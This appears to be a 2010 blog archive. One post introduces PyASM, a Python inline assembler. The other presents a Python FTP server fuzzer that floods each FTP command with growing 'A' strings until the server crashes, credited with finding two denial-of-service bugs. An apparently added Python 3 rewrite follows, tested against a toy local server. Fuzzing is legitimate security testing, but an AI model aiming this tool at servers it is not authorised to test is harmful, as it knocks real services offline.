Sunday, January 31, 2010

PyASM

Introduction

PyASM is a full-featured dynamic assembler written entirely in Python. By dynamic, I mean that it can generate and execute machine code from Python at runtime, without producing object files or going through a linker. It essentially allows 'inline' assembly in Python modules on x86 platforms.

PyASM can also generate object files (for Windows) like a traditional standalone assembler, although you're probably better off using one of the many freely available assemblers if this is your primary goal.

Installation

PyASM requires Python 2.4 or later. To the best of my knowledge, the only 2.4-specific feature I've used is the parenthesized form from x import (a, b, c), but I need to draw a line in the sand somewhere as far as the installations I'll test and support.

Linux Install:

Windows Install:

Hello World!

A simple Windows version of a hello_world.py program is as follows:



#
# Hello World in assembly: hello_World.py
#
#

from pyasm import pyasm

pyasm(globals(),r"""
!CHARS hello_str 'Hello world!\n\0'

!PROC hello_world PYTHON
!ARG self
!ARG args

PUSH hello_str
CALL PySys_WriteStdout
ADD ESP, 0x4
MOV EAX,PyNone
ADD [EAX],1
!ENDPROC
""")

hello_world()



http://members.verizon.net/~olsongt/usersGuide.html

Friday, January 29, 2010

FTP Fuzzing - update

This is a simple FTP server fuzzer written in Python.
This script helps you hunt for bugs. For example, I found two FTP vulnerabilities with it:
XM Easy Personal FTP Server 5.8 Remote Denial Of Service XM-ftp-dos.txt
FtpXQ FTP Server 3.0 Remote Denial Of Service Exploit ftpxq-dos.txt



[+] You must use Python 2.x
[+] Fixed the cmdtest loop

#!/usr/bin/python
# Simple FTP server fuzzer (Python 2.x). Logs in, then sends every command
# in cmdtest with an argument of 'A's whose length doubles each round until
# the server stops answering.
import socket, sys, time
banner = """
##############################################
## Iranian Pentesters Home ##
## Www.Pentesters.Ir ##
## PLATEN -[ H.jafari ]- ##
## Sample Ftp Fuzzer version 0.1 ##
## Code by: PLATEN ##
## E-mail && blog: ##
## h-jafari.blogspot.com ##
## pl4ten[at]gmail[dot]com ##
## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder ##
## and all members in Pentesters.ir ##
##############################################
"""
print banner
ip = raw_input("IP: ")
username = raw_input("Username: ")
passwd = raw_input("Password: ")
bytesize = int(raw_input("Max byte size: "))  # raw_input returns a string; compare as an int
port = 21  # if the server doesn't use the default port (21), change this.

# Commands whose argument gets replaced by the evil string. QUIT stays last:
# the server closes the connection after it, so anything sent afterwards
# would look like a crash. (NLST was mistyped as NSLT before.)
cmdtest = ["USER","PASS","LIST","MKD","ABOR","CWD","ACCT","NLST","DELE","APPE","PORT","PASV","NOOP",
           "AUTH","HOST","LANG","FEAT","RMD","SIZE","XRMD","XPWD","XCRC","XCUP","TYPE","RNFR","QUIT"]

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)  # a server that stops answering is reported as down instead of hanging the fuzzer
try:
    sock.connect((ip, port))
    r = sock.recv(1024)
    print "[+] " + r
except socket.error:
    print "\n[-] Connection error!\n"
    sys.exit(1)
try:
    sock.send("USER %s\r\n" % username)
    print "[+] " + sock.recv(1024)
except socket.error:
    print "[-] Username error!\n"
    sys.exit(1)
try:
    sock.send("PASS %s\r\n" % passwd)
    print "[+] " + sock.recv(1024)
except socket.error:
    print "[-] PassWord error!\n"
    sys.exit(1)

print "[+] Start Fuzzing...\n"
for i in cmdtest:
    d = 1  # restart the payload length for every command
    while d <= bytesize:
        payload = "\x41" * d
        print "[+] Send evil string", i, d, "\n"
        data = i + " " + payload + "\r\n"  # the payload is the command's argument
        try:
            sock.send(data)
            # A live server always replies, even if only with an error code.
            # An empty read means it closed the connection; a timeout or
            # socket error means it hung or died. (Re-connecting an already
            # connected socket, as before, always fails and proves nothing.)
            reply = sock.recv(1024)
            if not reply:
                raise socket.error("connection closed by server")
            d = d * 2
            time.sleep(0.5)
        except socket.error:
            sock.close()
            print "[+] Down! (%s with %d bytes)" % (i, d)
            sys.exit(0)
sock.close()
print "[+] Finished, server survived."
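The same grow-the-argument loop, written as an added example (Python 3, not the script above and not the author's code) so the crash detection can be run offline: the fuzzing loop is separated from the transport through a small probe function, each test case gets a fresh control connection so one crash cannot poison the next, and a constructed toy FTP server (FragileFTPHandler, with an arbitrary CRASH_LEN of 256 bytes) plays the role of the victim by dropping the connection when an argument is too long. The anonymous login tuple in the demo is likewise made up.

```python
"""Grow-the-argument FTP fuzzer with a reply-based liveness check.

Added example (Python 3), not part of the original script. The fuzzing
loop is separated from the transport so it can be exercised against a
fake in memory; FragileFTPHandler is a constructed toy server that
"crashes" on over-long arguments so the whole thing runs offline.
"""
import socket
import socketserver
import threading

# Commands whose argument gets replaced by the evil string.
COMMANDS = ["USER", "PASS", "CWD", "MKD", "DELE", "NOOP"]


def fuzz_command(probe, verb, max_len):
    """Send `verb` with an all-'A' argument whose length doubles from 1 up to
    max_len. `probe(verb, arg)` performs one exchange and returns the raw
    reply (b"" when the server hung up or timed out). Returns the first
    length that got no reply, or None if the server survived every case."""
    length = 1
    while length <= max_len:
        if not probe(verb, b"A" * length):
            return length
        length *= 2
    return None


def fuzz_all(probe, commands=COMMANDS, max_len=4096):
    """Fuzz every command independently; the length counter restarts per
    command (the original script forgot to reset it)."""
    return {verb: fuzz_command(probe, verb, max_len) for verb in commands}


def socket_probe(host, port, login=None, timeout=2.0):
    """Build a probe that uses a fresh control connection per test case, so a
    crash in one case cannot poison the next. `login` is an optional
    (user, password) tuple sent before the fuzzed command."""
    def probe(verb, arg):
        try:
            with socket.create_connection((host, port), timeout=timeout) as s:
                s.recv(1024)                         # 220 banner
                if login:
                    for v, a in zip((b"USER", b"PASS"), login):
                        s.sendall(v + b" " + a.encode() + b"\r\n")
                        s.recv(1024)
                s.sendall(verb.encode() + b" " + arg + b"\r\n")
                return s.recv(1024)                  # b"" means the peer closed
        except (socket.timeout, OSError):
            return b""                               # hang or reset: no reply
    return probe


class FragileFTPHandler(socketserver.StreamRequestHandler):
    """Toy FTP control channel (constructed for the demo): answers 200 to
    everything, but drops the connection without replying when an argument
    is longer than CRASH_LEN bytes, imitating a server that died."""
    CRASH_LEN = 256

    def handle(self):
        self.wfile.write(b"220 toy ftp ready\r\n")
        while True:
            line = self.rfile.readline()
            if not line:
                return
            verb, _, arg = line.rstrip(b"\r\n").partition(b" ")
            if len(arg) > self.CRASH_LEN:
                return                               # simulated crash
            if verb.upper() == b"QUIT":
                self.wfile.write(b"221 bye\r\n")
                return
            self.wfile.write(b"200 ok\r\n")


def start_toy_server():
    """Start the toy server on an ephemeral loopback port; returns (server, port)."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FragileFTPHandler)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


if __name__ == "__main__":
    srv, port = start_toy_server()
    try:
        probe = socket_probe("127.0.0.1", port, login=("anonymous", "x@y"))
        for verb, down_at in fuzz_all(probe).items():
            print(verb, "survived" if down_at is None else "down at %d bytes" % down_at)
    finally:
        srv.shutdown()
        srv.server_close()
```

Run it directly and every command reports "down at 512 bytes", the first doubling past the toy threshold. Against a real target, point socket_probe at the server, pass valid credentials in `login`, and treat a reported length only as the upper bound of the crash size: the next step is to bisect between the last surviving length and the reported one, and to confirm the crash in a debugger rather than trusting the dropped connection alone.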